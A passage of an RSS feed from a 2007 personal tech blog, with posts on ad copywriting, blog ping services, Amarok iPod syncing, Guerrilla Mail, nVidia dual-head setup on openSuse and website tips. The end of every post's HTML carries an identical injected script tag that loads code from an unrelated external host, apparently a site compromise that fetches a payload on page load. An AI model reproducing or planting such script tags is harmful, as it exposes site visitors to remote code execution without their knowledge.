</div>
</li>
<li>Use punctuation to emphasise key words<br />Punctuation is often neglected in advertising, but it can make a real difference to the style, look and sound of your ad. Use the extended set of keys: , . ? / : ; # ~ + &#8211; &not; |  .It may be difficult to add these in some style of ads, but use your imagination. Be careful not to overdo it though. </li>
<li>Use metaphors, similes, alliteration and personification &#8211; the basis of emotive writing. Look at appropriate wikpedia pages for help with these &#8211; I can&#39;t do it on here! </li>
<li>Incorporate relavant dates within ads<br />Very, very few ads have dates like deadlines for offers etc. in. This is usually because the ad template is set once, and then never changed. Apply recent offers or deals that appear legitimately on your website for a CTR boost.</li>
<li>Free culture<br />Use the word free legitimately and convincingly in your ad text to attract the people who just want free stuff, bless them! </li>
</ol>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/how-to-write-better-google-ads/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>XML-RPC pinging sites</title>
		<link>http://www.microplop.com/post/xml-rpc-pinging-sites/</link>
		<comments>http://www.microplop.com/post/xml-rpc-pinging-sites/#comments</comments>
		<pubDate>Wed, 28 Mar 2007 21:54:50 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Bloggers&#8230; add these addresses to your list of pinging services to help get your traffic up.  http://rpc.pingomatic.com/  http://rpc.technorati.com/rpc/ping  http://1470.net/api/ping http://api.feedster.com/ping   http://api.feedster.com/ping.php http://api.moreover.com/ping  http://api.moreover.com/RPC2 http://api.my.yahoo.com/RPC2   http://api.my.yahoo.com/rss/ping http://bblog.com/ping.php   http://bitacoras.net/ping http://blog.goo.ne.jp/XMLRPC   http://blogdb.jp/xmlrpc http://blogmatcher.com/u.php  http://blogsearch.google.com/ping/RPC2  http://blogsearch.google.com/ping/RPC2  http://blogsearch.google.com/ping/RPC2  http://blogupdate.org/ping  http://bulkfeeds.net/rpc  http://coreblog.org/ping/  [...]]]></description>
			<content:encoded><![CDATA[<p>Bloggers&#8230; add these addresses to your list of pinging services to help get your traffic up.  http://rpc.pingomatic.com/  http://rpc.technorati.com/rpc/ping  http://1470.net/api/ping http://api.feedster.com/ping   http://api.feedster.com/ping.php http://api.moreover.com/ping  http://api.moreover.com/RPC2 http://api.my.yahoo.com/RPC2   http://api.my.yahoo.com/rss/ping http://bblog.com/ping.php   http://bitacoras.net/ping http://blog.goo.ne.jp/XMLRPC   http://blogdb.jp/xmlrpc http://blogmatcher.com/u.php  http://blogsearch.google.com/ping/RPC2  http://blogsearch.google.com/ping/RPC2  http://blogsearch.google.com/ping/RPC2  http://blogupdate.org/ping  http://bulkfeeds.net/rpc  http://coreblog.org/ping/  http://mod-pubsub.org/kn_apps/blogchatt  http://ping.amagle.com/  http://ping.bitacoras.com  http://ping.blo.gs/  http://ping.blogg.de/  http://ping.bloggers.jp/rpc/  http://ping.blogmura.jp/rpc/  http://ping.cocolog-nifty.com/xmlrpc  http://ping.exblog.jp/xmlrpc  http://ping.feedburner.com  http://ping.myblog.jp  http://ping.rootblog.com/rpc.php  http://ping.syndic8.com/xmlrpc.php  http://ping.weblogalot.com/rpc.php  http://ping.weblogs.se/  http://pinger.blogflux.com/rpc/  http://pingqueue.com/rpc/  http://rcs.datashed.net/RPC2/  http://rpc.blogbuzzmachine.com/RPC2  http://rpc.blogrolling.com/pinger/  http://rpc.britblog.com/  http://rpc.icerocket.com:10080/  http://rpc.newsgator.com/  http://rpc.pingomatic.com/  http://rpc.tailrank.com/feedburner/RPC2  http://rpc.technorati.com/rpc/ping  http://rpc.weblogs.com/RPC2  http://rpc.wpkeys.com/  http://services.newsgator.com/ngws/xmlrpcping.aspx  http://signup.alerts.msn.com/alerts-PREP/submitPingExtended.doz   http://topicexchange.com/RPC2 http://trackback.bakeinu.jp/bakeping.php   http://www.a2b.cc/setloc/bp.a2b http://www.bitacoles.net/ping.php   http://www.blogdigger.com/RPC2  http://www.blogoole.com/ping/  http://www.blogoon.net/ping/  http://www.blogpeople.net/servlet/weblogUpdates  http://www.blogroots.com/tb_populi.blog?id=1  http://www.blogshares.com/rpc.php  http://www.blogstreet.com/xrbin/xmlrpc.cgi  http://www.feedsky.com/api/RPC2  http://www.holycowdude.com/rpc/ping/  http://www.imblogs.net/ping/  http://www.lasermemory.com/lsrpc/  http://www.mod-pubsub.org/kn_apps/blogchatter/ping.php  http://www.newsisfree.com/RPCCloud  http://www.newsisfree.com/xmlrpctest.php  http://www.popdex.com/addsite.php  http://www.snipsnap.org/RPC2  http://www.weblogues.com/RPC/  http://xmlrpc.blogg.de  http://xping.pubsub.com/ping/   https://phobos.apple.com/WebObjects/MZFinance.woa/wa/pingPodcast   http://www.packetmonster.net/xmlrpc.php<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/xml-rpc-pinging-sites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to synchronise iPods with Amarok</title>
		<link>http://www.microplop.com/post/how-to-synchronise-ipods-with-amarok/</link>
		<comments>http://www.microplop.com/post/how-to-synchronise-ipods-with-amarok/#comments</comments>
		<pubDate>Tue, 06 Mar 2007 00:41:12 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Apple]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open source]]></category>
		<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[It has always been tricky to find a way to sync ipods in Linux, but I&#8217;ve found a way.
1. Get Amarok (version &#62;= 1.4.4)
2. Make sure you have libipod installed &#8211; this allows iPod file functions.
3. Initialise all music in Amarok.
4. Initialise iPod
5. Goto &#8216;Playlist&#8217; on the left menu bar
6. Under &#8216;Smart Play lists&#8217; -&#62; [...]]]></description>
			<content:encoded><![CDATA[<p>It has always been tricky to find a way to sync ipods in Linux, but I&#8217;ve found a way.</p>
<p>1. Get Amarok (version &gt;= 1.4.4)</p>
<p>2. Make sure you have libipod installed &#8211; this allows iPod file functions.</p>
<p>3. Initialise all music in Amarok.</p>
<p>4. Initialise iPod</p>
<p>5. Goto &#8216;Playlist&#8217; on the left menu bar</p>
<p>6. Under &#8216;Smart Play lists&#8217; -&gt; Collection -&gt; All Collection.</p>
<p>7.  Right click -&gt; Synchronise to media device.</p>
<p>8. Goto &#8216;Media device&#8217; on left menu bar.</p>
<p>9. At the bottom of the left pane under &#8216;Transfer Queue&#8217; it should now read &#8216;All Collection&#8217;</p>
<p>10. Underneath the top menu bar select &#8216;Transfer&#8217;</p>
<p>Sorted!<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/how-to-synchronise-ipods-with-amarok/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Reduce spam with Guerrilla Mail</title>
		<link>http://www.microplop.com/post/reduce-spam-with-guerrilla-mail/</link>
		<comments>http://www.microplop.com/post/reduce-spam-with-guerrilla-mail/#comments</comments>
		<pubDate>Tue, 13 Feb 2007 17:42:33 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Found this service:
www.guerrillamail.com
You create a temporary email address which expires in 15 mins for your use on websites which need verification etc.
]]></description>
			<content:encoded><![CDATA[<p>Found this service:</p>
<p><a href="http://www.guerrillamail.com/" style="border-bottom-style: groove">www.guerrillamail.com</a></p>
<p>You create a temporary email address which expires in 15 mins for your use on websites which need verification etc.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/reduce-spam-with-guerrilla-mail/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dual-head nVidia powered displays on openSuse linux: Simple!</title>
		<link>http://www.microplop.com/post/dual-head-nvidia-powered-displays-on-opensuse-linux-simple/</link>
		<comments>http://www.microplop.com/post/dual-head-nvidia-powered-displays-on-opensuse-linux-simple/#comments</comments>
		<pubDate>Sun, 04 Feb 2007 20:22:45 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open source]]></category>
		<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Recently I told you that I was scrapping Windows. Well a few weeks down the line, I had a few problems with my multi-headed setup with my graphics card &#8211; the nVidia Geforce 7600 GT.
I installed the new version of openSuse without any problems; Setting up an Apache server with php, cgi and ruby on [...]]]></description>
			<content:encoded><![CDATA[<p>Recently I told you that I was scrapping Windows. Well a few weeks down the line, I had a few problems with my multi-headed setup with my graphics card &#8211; the nVidia Geforce 7600 GT.</p>
<p>I installed the new version of openSuse without any problems; Setting up an Apache server with php, cgi and ruby on rails all in the drop of a hat <a href="http://www.microplop.com/2006/fedoras-at-the-ready/">(not a fedora here, sorry Dr. AAA)</a>.</p>
<p>On first boot it displayed only on one of the screens, giving a dark off-centre shadow on the other screen &#8211; oh fudge I thought.<br />
A quick look on t&#8217;internet was no good, as the hard Linux nerds told me to get down and dirty in the X11 configuration files.</p>
<p>Before I even <em>thought</em> about considering this, I checked with nVidia themselves, and they gave me the closed-source Linux drivers &#8211; which didn&#8217;t download properly: parity errors. I then added the legendarily named &#8216;packman&#8217; repository to YaST2 &#8211; openSuse&#8217;s software manager.</p>
<p>A quick tick of a box and the nVidia drivers installed. When I rebooted, a little pop-up box came up helpfully saying, &#8216;Multi-head configuration found. Would you like to enable it?&#8217;. openSuse you beautie! It was as simple as that.</p>
<p>As a whole, Linux treats two screen setups a hell of a lot better than Windows does &#8211; it is a lot smoother in maximising windows and video across both screens, much more considered controls and configuration, and the openGL effects look mental on it!</p>
<p>So there you have it, openSuse, Linux and nVidia on Linux all rock as far as dual-head configs go.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/dual-head-nvidia-powered-displays-on-opensuse-linux-simple/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>8 simple ways to improve your website</title>
		<link>http://www.microplop.com/post/8-simple-ways-to-improve-your-website/</link>
		<comments>http://www.microplop.com/post/8-simple-ways-to-improve-your-website/#comments</comments>
		<pubDate>Fri, 02 Feb 2007 00:57:13 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[The following is a brief explanation of how to optimise web content for search engines such as google, msn etc&#8230;

Call-to-Action
Never have a link saying &#8216;Click here!&#8217;.
Always have a links that say: &#8216;More info on blah blah&#8217;.
Make sure that the link always loosely describes the target page.
Consistent and simple email signatures
Make your site&#8217;s layout and theme [...]]]></description>
			<content:encoded><![CDATA[<p>The following is a brief explanation of how to optimise web content for search engines such as google, msn etc&#8230;</p>
<ol>
<li><strong>Call-to-Action</strong><br />
Never have a link saying &#8216;Click here!&#8217;.<br />
Always have a links that say: &#8216;More info on blah blah&#8217;.<br />
Make sure that the link always loosely describes the target page.</li>
<li><strong>Consistent and simple email signatures</strong><br />
Make your site&#8217;s layout and theme consistent with a short CSS based signature which is consistent with all your employees.</li>
<li><strong>Customer-based passages</strong><br />
Instead of, &#8216;With our product, you can do this!&#8217;<br />
Try, &#8216;At Microplop.com, we always aim to provide you with the highest possible service possible&#8217;<br />
This maybe seen as management talk, but it will increase the period of time a user stays on your site.</li>
<li><strong>State a privacy and copyright statement</strong><br />
Goto http://creativecommons.org/ and create a license that will tell your customers about copyright issues and their rights to copy your content.<br />
Have a link in all outgoing emails saying &#8211; &#8216;We value your privacy&#8217;, which links to your site&#8217;s privacy agreement. This has been known to increase email subscription rate of up to 250%, as the customer feels safer with you having their details.</li>
<li><strong>Use superlatives carefully</strong><br />
Superlatives in your content are dangerous. Words such as &#8216;best, cheapest, most visited&#8230;&#8217; are strong words, and are rarely proven on websites.<br />
Where a superlative is used, cite it&#8217;s reference and proof from a 3rd party of it being true.</li>
<li><strong>Custom 404 error pages</strong><br />
You will be able to setup custom 404 (page not found) error pages on your server. These are most effective if the same site layout is kept, with a site-map and webmaster email address in full display so the user can interact better with your site, and stay on it longer.<strong><br />
</strong></li>
<li><strong>Update regularly and predictably</strong><br />
This is the hardest one to manage. If you add quality content at the same time roughly every week or every day(on Fridays, 9pm), your natural rankings will hugely benefit.<br />
If there is a huge gap in postings, your site&#8217;s natural rankings will fall.</li>
<li><strong>Publish pictures of the team, and address of business</strong><br />
Having a sense of physical address of the business and &#8216;a face to a name&#8217; greatly helps the customer trust you with their money.</li>
</ol>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/8-simple-ways-to-improve-your-website/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
